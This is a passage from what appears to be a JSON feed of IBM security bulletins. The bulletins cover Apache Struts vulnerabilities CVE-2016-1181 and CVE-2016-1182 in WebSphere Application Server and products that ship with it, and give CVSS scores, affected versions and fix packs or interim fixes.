Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nThe following Versions of WebSphere Application Server and IBM WebSphere Application Server Hypervisor Edition may be affected: \n\n * Version 9.0\n * Version 8.5 and 8.5.5 Full Profile \n * Version 8.0 \n * Version 7.0 \n\n## Remediation/Fixes\n\n**For IBM WebSphere Application Server and IBM WebSphere Application Server Hypervisor Edition:** \n \n**For V9.0.0.0**\n\n * Apply Interim Fix [PI64303](<http://www-01.ibm.com/support/docview.wss?uid=swg24042468>) [](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039898>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039403>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038969>)\n\\-- OR \n * Apply Fix Pack 1 (9.0.0.1), or later.\n** \nFor V8.5.0.0 through 8.5.5.9:**\n\n * Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix [PI64303](<http://www-01.ibm.com/support/docview.wss?uid=swg24042468>) [](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039898>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039403>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038969>)\n\\-- OR \n * Apply Fix Pack 10 (8.5.5.10), or later.\n** \nFor V8.0.0.0 through 8.0.0.12:**\n\n * Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix [PI64303](<http://www-01.ibm.com/support/docview.wss?uid=swg24042468>) [](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039898>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039403>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24038969>)\n\\-- OR \n * Apply Fix Pack 13 (8.0.0.13), or later.\n** \nFor V7.0.0.0 through 7.0.0.41:**\n\n * Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix [PI64303](<http://www-01.ibm.com/support/docview.wss?uid=swg24042468>) [](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039898>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24039403>)\n\\-- OR \n * Apply Fix Pack 43 (7.0.0.43), or later. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-15T07:05:55", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-15T07:05:55", "id": "CD1AEA82D347BCF45C817F297F91F17B63798AE3055B653759D8342B9405F1E0", "href": "https://www.ibm.com/support/pages/node/283179", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:50:12", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Tivoli Federated Identity Manager and IBM Tivoli Federated Identity Manager Business Gateway. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletin [Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nIBM Tivoli Federated Identity Manager 6.2.1 \nIBM Tivoli Federated Identity Manager Business Gateway 6.2.1| IBM WebSphere Application Server 7.0 \nIBM Tivoli Federated Identity Manager 6.2.2 \nIBM Tivoli Federated Identity Manager Business Gateway 6.2.2| IBM WebSphere Application Server 7.0, 8.0, 8.5 \n \n## Remediation/Fixes\n\nIBM Tivoli Federated Identity Manager and IBM Tivoli Federated Identity Manager Business Gateway are affected through IBM WebSphere Application Server. If you use one of the affected versions of WebSphere, update your IBM WebSphere Application Server with the appropriate Interim Fix based on information in the WebSphere security bulletin, ([Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>).\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-16T21:49:00", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Tivoli Federated Identity Manager and IBM Tivoli Federated Identity Manager Business Gateway (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-16T21:49:00", "id": "E3BD856982B27C3FE93EC13A76D5806B5BB18B95DD328F70706B73BE68D790ED", "href": "https://www.ibm.com/support/pages/node/287829", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:47:40", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Case Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletin [Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nAffected IBM WebSphere Application Server versions are listed in the security bulletin.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-17T12:16:26", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Case Manager (CVE-2016-1181, CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-17T12:16:26", "id": "A38279E551792BA29F1FA34034CD64E94266819C4862EDC7B206E7A748D269FD", "href": "https://www.ibm.com/support/pages/node/547525", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:52:44", "description": "## Summary\n\nIBM Financial Transaction Manager for Corporate Payment Services open source Apache Struts Vulnerabilities (CVE-2016-1181 CVE-2016-1182)\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\n\\- FTM for CPS v2.1.1.0, v2.1.1.1, v2.1.1.2, v2.1.1.3\n\n## Remediation/Fixes\n\nProduct\n\n| VRMF| APAR| Remediation/First Fix \n---|---|---|--- \nFTM for Corporate Payment Services| 2.1.1.0, \n2.1.1.1, \n2.1.1.2, \n2.1.1.3| PI66509| Apply [2.1.1-FTM-CPS-MP-fp0004](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=Financial%2BOperations&product=ibm/Other+software/Financial+Transaction+Manager&release=All&platform=All&function=fixId&fixids=2.1.1-FTM-CPS-MP-fp0004&includeSupersedes=0&source=fc>) or later \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-16T20:03:06", "type": "ibm", "title": "Security Bulletin: IBM Financial Transaction Manager for Corporate Payment Services open source Apache Struts Vulnerabilities (CVE-2016-1181 CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-16T20:03:06", "id": "C9D56908C5941D51F8B700D0AEB133B65A72D4A5D3A7FAA2D989A477B71C954D", "href": "https://www.ibm.com/support/pages/node/548021", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:54:09", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Business Monitor. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletin [Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nIBM Business Monitor V8.5.5, V8.5.6 and V8.5.7 \n\nIBM Business Monitor V8.0.1.3\n\nIBM Business Monitor V7.5.1.2\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-15T07:05:59", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Business Monitor (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-15T07:05:59", "id": "9CC98367A213309185EDA7DC75FCDBBA5D5754142F33E0C8ED1B454D10CF416E", "href": "https://www.ibm.com/support/pages/node/284535", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:56:36", "description": "## Summary\n\nWebSphere Application Server is shipped with WebSphere Remote Server. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nWebSphere Remote Server 7.0, 7.1, 7.1.1, 7.1.2, 8.5\n\n## Remediation/Fixes\n\nRefer to the following security bulletins for vulnerability details and information about fixes addressed by WebSphere Application Server which is shipped with WebSphere Remote Server. \n \n\n\nPrincipal Product and Version(s)| Affected Supporting Product and Version| Affected Supporting Product Security Bulletin \n---|---|--- \nWebSphere Remote Server 7.0, 7.1, 7.1.1, 7.1.2, 8.5| WebSphere Application Server 7.0, 8.0, 8.5, 8.5.5, 9.0| [_Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)_](<http://www.ibm.com/support/docview.wss?uid=swg21985995>) \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-15T07:06:00", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with WebSphere Remote Server (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-15T07:06:00", "id": "3CFF13ADA1D4912594BB3AC9D0D9ACB17881A208B1AD8998A1E8BD64DD6C5268", "href": "https://www.ibm.com/support/pages/node/547521", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:51:22", "description": "## Summary\n\nWebSphere Application Server is/are shipped with Financial Transaction Manager. Information about security vulnerabilities affecting WebSphere Application Server have been published in a security bulletin. \n\n## Vulnerability Details\n\nRefer to the security bulletin listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nFinancial Transaction Manager for MP v2.0| WebSphere Application Server 7.0 \nFinancial Transaction Manager for MP v2.1| WebSphere Application Server 8.0 \nFinancial Transaction Manager for MP v3.0| WebSphere Application Server 8.5.5 \n \n## Remediation/Fixes\n\nRefer to the following security bulletins for vulnerability details and information about fixes addressed by WebSphere Application Server which is/are shipped with Financial Transaction Manager. \n \n\n\nPrincipal Product and Version(s)| Affected Supporting Product and Version| Affected Supporting Product Security Bulletin \n---|---|--- \nFinancial Transaction Manager for MP v2.0| WebSphere Application Server 7.0| [_Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) \nFinancial Transaction Manager for MP v2.1| WebSphere Application Server 8.0 \nFinancial Transaction Manager for MP v3.0| WebSphere Application Server 8.5.5 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-16T20:02:01", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities have been identified in WebSphere Application Server shipped with Financial Transaction Manager (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-16T20:02:01", "id": "F2A538AF2ED1CAABCF5F0891DB02363ECADA659FE7F2989D3CCD7668E4585622", "href": "https://www.ibm.com/support/pages/node/284149", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:47:59", "description": "## Summary\n\nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. This vulnerability also affects other products. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Content Collector for Microsoft SharePoint v3.0 \nIBM Content Collector for Microsoft SharePoint v4.0 \nIBM Content Collector for Microsoft SharePoint v4.0.1\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRM**| **Remediation** \n---|---|--- \nIBM Content Collector for Microsoft SharePoint| 3.0| Use IBM Content Collector for Microsoft SharePoint 4.0.1.5 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.5-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>) \nIBM Content Collector for Microsoft SharePoint| 4.0| Use IBM Content Collector for Microsoft SharePoint 4.0.1.5 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.5-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>) \nIBM Content Collector for Microsoft SharePoint| 4.0.1| Use IBM Content Collector for Microsoft SharePoint 4.0.1.5 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.5-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>) \n \nFollow the steps in the readme file in the 4.0.1.5 interim fix 001 to install the interim fix applicable to your version. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-17T12:17:48", "type": "ibm", "title": "Security Bulletin: OpenSource Apache Struts vulnerability in IBM Content Collector for Microsoft SharePoint", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-17T12:17:48", "id": "D75C787D719F6B509B47AAA92C0EBBE969DDCD2CD7BAA1800C224FD759790609", "href": "https://www.ibm.com/support/pages/node/292421", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T21:52:18", "description": "## Summary\n\nStruts vulnerabilities affect ISD Server. ISD Server has addressed the applicable CVEs.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nFrom the IBM System Director command line enter smcli lsver to determine the level of IBM System Director installed. \n \nIBM Systems Director: \n\n\n * 6.1.0.0\n * 6.1.0.1\n * 6.1.0.2\n * 6.1.0.3\n * 6.1.1.1\n * 6.1.1.2\n * 6.1.1.3\n * 6.1.2.0\n * 6.1.2.1\n * 6.1.2.2\n * 6.1.2.3\n * 6.2.0.0\n * 6.2.0.1\n * 6.2.0.2\n * 6.2.1.0\n * 6.2.1.0\n * 6.2.1.1\n * 6.2.1.2\n * 6.3.0.0 \n * 6.3.1.0 \n * 6.3.1.1 \n * 6.3.2.0 \n * 6.3.2.1 \n * 6.3.2.2 \n * 6.3.3.0 \n * 6.3.3.1 \n * 6.3.5.0 \n * 6.3.6.0\n * 6.3.7.0\n\n## Remediation/Fixes\n\nIBM Systems Director version pre 6.3.5 are unsupported and will not be fixed. IBM recommends upgrading to a fixed, supported version of the product. \n\nFollow the instructions mentioned in Technote [811735241](<http://www-01.ibm.com/support/docview.wss?uid=nas74ca280436f7c28b1862580f1005aa33d>)[](<http://www-01.ibm.com/support/docview.wss?uid=nas72cf7b7fb4cdb924b862580a40000b3be>) to apply the fix for releases:\n\n * 6.3.5.0\n * 6.3.6.0\n * 6.3.7.0\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-18T01:35:34", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Struts affect IBM Systems Director (ISD) Server (CVE-2016-1181, CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-18T01:35:34", "id": "1D6C51DC7D1DD9D1A9F07B9737CE12B7F8F933D3089EBCB68A0BBCF75680D250", "href": "https://www.ibm.com/support/pages/node/630929", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:47:48", "description": "## 